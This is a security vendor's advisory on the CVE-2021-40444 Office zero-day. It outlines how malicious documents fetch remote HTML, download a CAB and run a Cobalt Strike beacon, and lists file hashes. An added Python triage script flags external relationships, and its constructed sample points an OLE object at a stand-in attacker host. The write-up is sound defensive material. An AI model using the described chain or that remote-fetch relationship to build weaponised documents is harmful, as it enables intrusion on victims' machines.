Remote Code Execution Zero-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs
By: Trend Micro
September 09, 2021
Microsoft has disclosed the existence of a new zero-day vulnerability that affects multiple versions of Windows. This vulnerability (designated as CVE-2021-40444) is currently delivered via malicious Office 365 documents and requires user input to open the file to trigger. It should be noted that by default, Office documents downloaded from the internet are opened either in Protected View or Application Guard, both of which can mitigate this particular attack.
If the attacker is able to convince the victim to download the file and bypass any mitigation, it could trigger the vulnerability and cause a malicious file to be downloaded and run on the affected machine. Currently, this vulnerability is used to deliver Cobalt Strike payloads.
Microsoft has issued an official bulletin covering this vulnerability. This blog entry discusses how the exploit may work, as well as Trend Micro solutions.
We have obtained several samples of documents that exploit this vulnerability. The documents all contain the following code in the document.xml.rels file of their package:
Figure 1. Code with XML relationships
Note the presence of a URL (which we have removed) that downloads a file titled side.html (SHA-256: d0fd7acc38b3105facd6995344242f28e45f5384c0fdf2ec93ea24bfbc1dc9e6). This file contained obfuscated JavaScript; the image in Figure 2 shows part of the deobfuscated code.
Figure 2. Deobfuscated JavaScript code
Several actions can be seen in this code: it downloads a .CAB file, extracts a .DLL file from the said .CAB file, and uses path traversal attacks to run the file (which is named championship.inf).
Eventually, this leads to the execution of the championship.inf file, as seen below:
Figure 3. Properties for execution of payload
This payload is a Cobalt Strike beacon (SHA-256: 6eedf45cb91f6762de4e35e36bcb03e5ad60ce9ac5a08caeb7eda035cd74762b), which we detect as Backdoor.Win64.COBEACON.OSLJAU. As is typically the case with Cobalt Strike, this could allow an attacker to take control of the affected system. The malicious Office files are detected as Trojan.W97M.CVE202140444.A, with the malicious .CAB file detected as Trojan.Win64.COBEACON.SUZ.
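The first stage of the chain above lives in the document's relationship file: an external relationship that makes Office fetch content from a remote URL. The following added example (not code from the original post or from Trend Micro) opens a .docx as the zip package it is, parses word/_rels/document.xml.rels and reports every External relationship with an http/https/mhtml target that is not an ordinary hyperlink; the sample document, domain and relationship IDs it builds are constructed for the demonstration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

RELS_PATH = "word/_rels/document.xml.rels"
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
REMOTE_SCHEMES = {"http", "https", "mhtml"}


def suspicious_external_rels(docx_bytes: bytes) -> list[dict]:
    """Return relationships in document.xml.rels that pull content from the network.

    Ordinary hyperlinks are External too and are skipped; any other relationship that
    is marked External and points at an http/https/mhtml target is reported, which is
    how the samples above fetch their first-stage HTML.
    """
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if RELS_PATH not in z.namelist():
            return []  # no main-document relationships part, nothing to inspect
        root = ET.fromstring(z.read(RELS_PATH))
    hits = []
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        target = rel.get("Target", "")
        rel_type = rel.get("Type", "")
        if rel.get("TargetMode") != "External" or rel_type == HYPERLINK_TYPE:
            continue
        if urlparse(target).scheme.lower() in REMOTE_SCHEMES:
            hits.append({"id": rel.get("Id"), "type": rel_type.rsplit("/", 1)[-1], "target": target})
    return hits


def build_sample_docx(rels_xml: str) -> bytes:
    """Build a minimal, constructed .docx-style zip holding only the parts we need."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr(RELS_PATH, rels_xml)
    return buf.getvalue()


# Constructed sample: one harmless hyperlink and one object relationship fetched from the network.
SAMPLE_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{HYPERLINK_TYPE}" Target="https://example.com/" TargetMode="External"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
                Target="http://attacker.invalid/side.html" TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    for hit in suspicious_external_rels(build_sample_docx(SAMPLE_RELS)):
        print(f"suspicious {hit['type']} relationship {hit['id']} -> {hit['target']}")
```

Run it over a mail-gateway quarantine or a sample share to triage documents before they reach a user; a hit is a reason to detonate or block, not proof of exploitation on its own.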
As we noted earlier, Microsoft has yet to release an official patch. We reiterate our long-standing advice to avoid opening files from unexpected sources, which can greatly lower the risk of this threat since it requires the user to actually open the malicious file.
We will update this post as necessary if more information becomes available. Updates on Trend Micro solutions can be found on this knowledge base page.
Indicators of Compromise